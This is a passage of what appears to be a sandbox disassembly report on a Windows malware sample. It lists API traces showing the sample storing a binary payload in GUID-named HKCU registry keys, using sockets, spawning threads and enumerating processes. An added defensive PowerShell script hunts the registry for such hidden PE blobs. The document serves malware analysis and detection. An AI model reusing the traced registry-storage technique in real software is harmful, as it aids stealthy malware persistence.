                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • _memset.LIBCMT ref: 007C96E5
                                                                            • __snwprintf.LIBCMT ref: 007C9703
                                                                            • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F013F,?), ref: 007C9722
                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000003,00000000,00000000), ref: 007C974B
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C9759
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9763
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C976D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C977E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9788
                                                                            Strings
                                                                            • {70F925A9-13A6-49C0-913B-C685A8E9B495}, xrefs: 007C96ED
                                                                            • SOFTWARE\%s, xrefs: 007C96F2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Allocwnsprintf$CloseOpenQueryValue__snwprintf_memset_wcsrchr
                                                                            • String ID: SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 1140279918-90677415
                                                                            • Opcode ID: a009ef9740a6b3bd251f332d6f5eb0291f68658d26e814faae17ceb206892ca8
                                                                            • Instruction ID: 34a4ac7aae2ae598b6101eb0f6a2f823bb8283edfe5b29e3363ee3e094de6538
                                                                            • Opcode Fuzzy Hash: a009ef9740a6b3bd251f332d6f5eb0291f68658d26e814faae17ceb206892ca8
                                                                            • Instruction Fuzzy Hash: E0311E75A10208ABDB54DBA4DC4DFEE7778EF48700F104998F605E7290EB799A44CB51
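The two registry routines above describe a payload cached in the user hive: the function at 007C9FF4..007CA0D9 resolves its own path with GetModuleFileNameW, reads that file through the subcall at 007DC570 (CreateFileW, GetFileSize, LocalAlloc, ReadFile) and calls RegSetValueExW under HKEY_CURRENT_USER (80000001) with type 00000003 (REG_BINARY), value name {CE0CD485-D472-437F-80D7-DAF95EA046F4}, beneath SOFTWARE\{DE7C4D5F-E773-43F0-B029-ED407FF538E8}; the function at 007C96E5..007C9788 opens SOFTWARE\{70F925A9-13A6-49C0-913B-C685A8E9B495} with KEY_ALL_ACCESS (000F013F) and queries its default value (lpValueName 00000000), again expecting REG_BINARY. The PowerShell hunt below is an added example for the responder, not part of the Joe Sandbox report or of the sample. It assumes that the bytes written are the PE image the subcall read (the trace shows the file being read and a REG_BINARY write, not the content of the buffer), and the function name Test-RegistryPeBlob is hypothetical; the GUID key and value names are the ones observed in this trace, and the generic GUID-named-key plus MZ-header check also covers the default value under the third GUID.

```powershell
# Added example (not from the Joe Sandbox report): hunt HKCU\SOFTWARE for the pattern
# seen at 007CA041..007CA0AB and 007C96ED..007C974B:
#   RegOpenKeyW(HKEY_CURRENT_USER, "SOFTWARE\{GUID}")
#   RegSetValueExW / RegQueryValueExW(<GUID or default value name>, REG_BINARY, ...)
# Assumption: the REG_BINARY blob is a PE image (the trace reads the running image first).

$ObservedKey   = '{DE7C4D5F-E773-43F0-B029-ED407FF538E8}'   # key name from the trace
$ObservedValue = '{CE0CD485-D472-437F-80D7-DAF95EA046F4}'   # value name from the trace
$GuidName      = '^\{[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}\}$'

function Test-RegistryPeBlob {
    # Hypothetical helper name; returns one record per REG_BINARY value under a GUID-named subkey.
    param([Parameter(Mandatory)][string]$Hive)   # e.g. 'HKCU:\SOFTWARE'

    Get-ChildItem -Path $Hive -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match $GuidName } |
        ForEach-Object {
            $key = $_
            # GetValueNames() includes '' for the key's default value, which is what
            # RegQueryValueExW(lpValueName = NULL) reads in the second routine.
            foreach ($name in $key.GetValueNames()) {
                if ($key.GetValueKind($name) -ne 'Binary') { continue }
                $data = [byte[]]$key.GetValue($name)
                # A PE image stored as REG_BINARY starts with the 'MZ' DOS header.
                $isPe = ($data.Length -ge 2 -and $data[0] -eq 0x4D -and $data[1] -eq 0x5A)
                [pscustomobject]@{
                    Key      = $key.Name
                    Value    = if ($name -eq '') { '(Default)' } else { $name }
                    Bytes    = $data.Length
                    LooksPE  = $isPe
                    Observed = ($key.PSChildName -eq $ObservedKey -and $name -eq $ObservedValue)
                }
            }
        }
}

# Run in the profile that executed the sample; HKCU is per-user, so repeat per loaded hive.
# Export the hits to the case file; a 'LooksPE' row is worth carving and hashing.
Test-RegistryPeBlob -Hive 'HKCU:\SOFTWARE' |
    Where-Object { $_.LooksPE -or $_.Observed } |
    Format-Table -AutoSize
```

Because the write goes to HKCU, the artifact lives in the NTUSER.DAT of the user who ran the sample, so on a dead-box image mount that hive (or point the function at an HKU:\<SID>\SOFTWARE path after loading it) rather than the analyst's own profile.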
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000280), ref: 007E2700
                                                                            • lstrcpyW.KERNEL32(0000001C,CPU001), ref: 007E2735
                                                                              • Part of subcall function 007DC3A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007DC3DB
                                                                              • Part of subcall function 007DC3A0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 007DC3F4
                                                                              • Part of subcall function 007DC3A0: FreeSid.ADVAPI32(?), ref: 007DC409
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007E2754
                                                                            • LocalFree.KERNEL32(00000020), ref: 007E2762
                                                                            • LocalFree.KERNEL32(00000020), ref: 007E2796
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocAllocateCheckFileInitializeMembershipModuleNameTokenlstrcpy
                                                                            • String ID: %s [%d]$CPU001
                                                                            • API String ID: 2255487582-1715046084
                                                                            • Opcode ID: a764ed32673b94ce2577a44aefb768cbe91f30b7f8218676a677d27ec2524901
                                                                            • Instruction ID: 6d100cdf96fc84d22e25c17cf99aead13901e2ab8cb0f55fd94550531349d4cb
                                                                            • Opcode Fuzzy Hash: a764ed32673b94ce2577a44aefb768cbe91f30b7f8218676a677d27ec2524901
                                                                            • Instruction Fuzzy Hash: 1D316DB4E01208AFDB10DBA4DC4DBADB7B4EF8C704F1085A8E506A7251DB789A85CF50
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 007E2466
                                                                            • CoCreateGuid.COMBASE(c ~), ref: 007E2478
                                                                            • StringFromGUID2.COMBASE(c ~,?,00000027), ref: 007E2490
                                                                            • wsprintfA.USER32 ref: 007E24AB
                                                                            • LocalAlloc.KERNEL32(00000040,00000068), ref: 007E24B8
                                                                            • und_memcpy.LIBCMTD ref: 007E2505
                                                                            • LocalFree.KERNEL32(00000000), ref: 007E2511
                                                                            • CoUninitialize.COMBASE ref: 007E2517
                                                                            • CoUninitialize.COMBASE ref: 007E2524
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
                                                                            • String ID: c ~$c ~
                                                                            • API String ID: 3539965953-562358039
                                                                            • Opcode ID: aaacc4b15bd60aadd8248ae22f50b90718cee060ce066196359345bcb7fee820
                                                                            • Instruction ID: b572a5f5f82b80faa583ac17d08271c2c0717d8ccf59aa94802a6769adbd8355
                                                                            • Opcode Fuzzy Hash: aaacc4b15bd60aadd8248ae22f50b90718cee060ce066196359345bcb7fee820
                                                                            • Instruction Fuzzy Hash: 5E2186B2A00308EBDB04DBB4ED4AFAE77B9BF58705F044518F609DB281EA35D914CB51
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 007DACE8
                                                                            • _memset.LIBCMT ref: 007DACFB
                                                                            • RegisterClassW.USER32(?), ref: 007DAD1E
                                                                            • GetLastError.KERNEL32 ref: 007DAD30
                                                                            • CreateWindowExW.USER32(00000000,{6E456649-C3EE-4FD5-A6F9-EDD17ADE88F3},007F705C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007DAD64
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DAD87
                                                                            • TranslateMessage.USER32(?), ref: 007DAD95
                                                                            • DispatchMessageW.USER32(?), ref: 007DAD9F
                                                                            • DestroyWindow.USER32(00000000), ref: 007DADAD
                                                                            • UnregisterClassW.USER32({6E456649-C3EE-4FD5-A6F9-EDD17ADE88F3},00000000), ref: 007DADC5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
                                                                            • String ID: {6E456649-C3EE-4FD5-A6F9-EDD17ADE88F3}
                                                                            • API String ID: 1736019982-2008418920
                                                                            • Opcode ID: 89e84cc7565993987608a723c604465cc6773f30ab34953ca4a167fd1124e1a3
                                                                            • Instruction ID: 2a090287953ab0f70df21ba056926cd9ebfdec73e5e75f191cdf99d274bf9a0d
                                                                            • Opcode Fuzzy Hash: 89e84cc7565993987608a723c604465cc6773f30ab34953ca4a167fd1124e1a3
                                                                            • Instruction Fuzzy Hash: 22218E71A41308FBD704DFA0EC49BAE7B75FB48702F008419F601A72E1DBB8A905DB69
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 007D76F8
                                                                            • _memset.LIBCMT ref: 007D770B
                                                                            • RegisterClassW.USER32(?), ref: 007D772E
                                                                            • GetLastError.KERNEL32 ref: 007D7740
                                                                            • CreateWindowExW.USER32(00000000,{E5AC99DD-1415-4022-BE6C-AB9045565FB3},007F49E4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D7774
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007D7797
                                                                            • TranslateMessage.USER32(?), ref: 007D77A5
                                                                            • DispatchMessageW.USER32(?), ref: 007D77AF
                                                                            • DestroyWindow.USER32(00000000), ref: 007D77BD
                                                                            • UnregisterClassW.USER32({E5AC99DD-1415-4022-BE6C-AB9045565FB3},00000000), ref: 007D77D5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister_memset
                                                                            • String ID: {E5AC99DD-1415-4022-BE6C-AB9045565FB3}
                                                                            • API String ID: 1736019982-4116564367
                                                                            • Opcode ID: 6c60ef491a39b80d826a4f7264353d76b4289c1a3017370afadc198f7b703f8e
                                                                            • Instruction ID: f6397d2049797089a2665731d830e3a3ac8547db2467677c30d453491fa6d731
                                                                            • Opcode Fuzzy Hash: 6c60ef491a39b80d826a4f7264353d76b4289c1a3017370afadc198f7b703f8e
                                                                            • Instruction Fuzzy Hash: E7213075944204EFD704DFA0DC49FAD7B75FB88711F10881AE605B6290EBB85946CB64
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C9F00
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007C9F16
                                                                            • __snwprintf.LIBCMT ref: 007C9F3A
                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007C9F55
                                                                            • lstrlenW.KERNEL32(?), ref: 007C9F66
                                                                            • RegSetValueExW.ADVAPI32(?,{73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8},00000000,00000001,?,00000002), ref: 007C9F88
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C9F99
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007C9FAD
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007C9F24
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 007C9F7C
                                                                            • SOFTWARE\%s, xrefs: 007C9F29
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$FileModuleNameOpenValue__snwprintf_memsetlstrlen
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 1214033602-923683513
                                                                            • Opcode ID: 7f0e830452b5619d740b34fdacd2187c23a5385a106d78d06a90c9860de30874
                                                                            • Instruction ID: 247040fc093d3e2515e4432c0443bc6430c1911d9ae7959a08cadee643af619c
                                                                            • Opcode Fuzzy Hash: 7f0e830452b5619d740b34fdacd2187c23a5385a106d78d06a90c9860de30874
                                                                            • Instruction Fuzzy Hash: DB11CBB5A00304ABD764DB70DC4DFE67378AB84B00F004A8CB719D6191EAB49A84CFA1
                                                                            APIs
                                                                            • GetWindowsDirectoryW.KERNEL32(8U|,00000104,?,007C5538,00000000), ref: 007C9CF2
                                                                            • __snwprintf.LIBCMT ref: 007C9D0E
                                                                            • GetSystemDirectoryW.KERNEL32(8U|,00000104), ref: 007C9D2E
                                                                            • __snwprintf.LIBCMT ref: 007C9D4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Directory__snwprintf$SystemWindows
                                                                            • String ID: %s\CMD.EXE$%s\EXPLORER.EXE$%s\SVCHOST.EXE$8U|
                                                                            • API String ID: 2322266053-681786168
                                                                            • Opcode ID: c826741fe83a472d551fcc5149b2c12aeb10c89e425b46d51aad2fa89cbbacb7
                                                                            • Instruction ID: 6f5ab83f8b5a68265d98428f30c2e5769c57a93a8ff1335c7f3c155da4c6d4ca
                                                                            • Opcode Fuzzy Hash: c826741fe83a472d551fcc5149b2c12aeb10c89e425b46d51aad2fa89cbbacb7
                                                                            • Instruction Fuzzy Hash: CB1112B1740344ABEF44EE64CC8DFBA3765AB44700F14481DFB1AAF280DAB8D990D751
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007C6EEB
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C702F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C7073
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C70B5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C7117
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C71A5
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C723B
                                                                            • closesocket.WS2_32(?), ref: 007C7245
                                                                              • Part of subcall function 007E0CD0: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E0CED
                                                                              • Part of subcall function 007E0950: ___crtGetLocaleInfoEx.LIBCMTD ref: 007E096D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleInfoLocale___crt$EventFreeObjectSingleVirtualWaitclosesocketsetsockoptshutdown
                                                                            • String ID: d
                                                                            • API String ID: 3427925336-2564639436
                                                                            • Opcode ID: 6ff8b026cc846954afe03c5cd875596052a6430b2f53918e42d29c7a3098174c
                                                                            • Instruction ID: 86d772607899f4f85170c29d420fee298090229e5ba9b589db94f5d94431581d
                                                                            • Opcode Fuzzy Hash: 6ff8b026cc846954afe03c5cd875596052a6430b2f53918e42d29c7a3098174c
                                                                            • Instruction Fuzzy Hash: 35A14F71A00218DFEB28DF64CC85FAEB775FB94304F14829CE119AB292DB759A85CF50
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000,?,007D720B,?), ref: 007D74EB
                                                                            • CloseHandle.KERNEL32(00000000,?,007D720B,?), ref: 007D7523
                                                                            • CloseHandle.KERNEL32(00000000,?,007D720B,?), ref: 007D7543
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007D720B,?), ref: 007D755B
                                                                            • CreateThread.KERNEL32(00000000,00000000,?,?,00000004,00000000), ref: 007D757A
                                                                            • ResumeThread.KERNEL32(00000000), ref: 007D75A8
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D75BE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D75C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$CreateThread$EventObjectResumeSingleWait
                                                                            • String ID: d
                                                                            • API String ID: 144976343-2564639436
                                                                            • Opcode ID: 174e60fb56173311ee9e096a50e74d57e038eb9a64d7b917a547bdddf3382e2f
                                                                            • Instruction ID: e3c1375f35896b75b75bbb0429f50ccbe2c039f904cf4d506766bc8a24cb9782
                                                                            • Opcode Fuzzy Hash: 174e60fb56173311ee9e096a50e74d57e038eb9a64d7b917a547bdddf3382e2f
                                                                            • Instruction Fuzzy Hash: 6E4129B4A04219DFDB04CF94D888BAEBBB1FB48304F24C549E516A7391D779D981CF91
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                            • lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                            • lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                            • __snwprintf.LIBCMT ref: 007CFEDA
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007CFF04
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath__snwprintf
                                                                            • String ID: %s\%s\
                                                                            • API String ID: 3447735180-2168696002
                                                                            • Opcode ID: be12cd56a6b32aadb0bf44660bef6f5192ecfb77bc8c1c5e6ba510fafd571e9f
                                                                            • Instruction ID: d31f1d419fe86e2b7af13551a36bf281acbd7e1d34d758e942e10f8ad00cf065
                                                                            • Opcode Fuzzy Hash: be12cd56a6b32aadb0bf44660bef6f5192ecfb77bc8c1c5e6ba510fafd571e9f
                                                                            • Instruction Fuzzy Hash: 9631DAB5E00209EFCB04DFA8D885EAEBBB5FF88304F148559E905A7351D734A941CFA4
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C24A4
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007C24CC
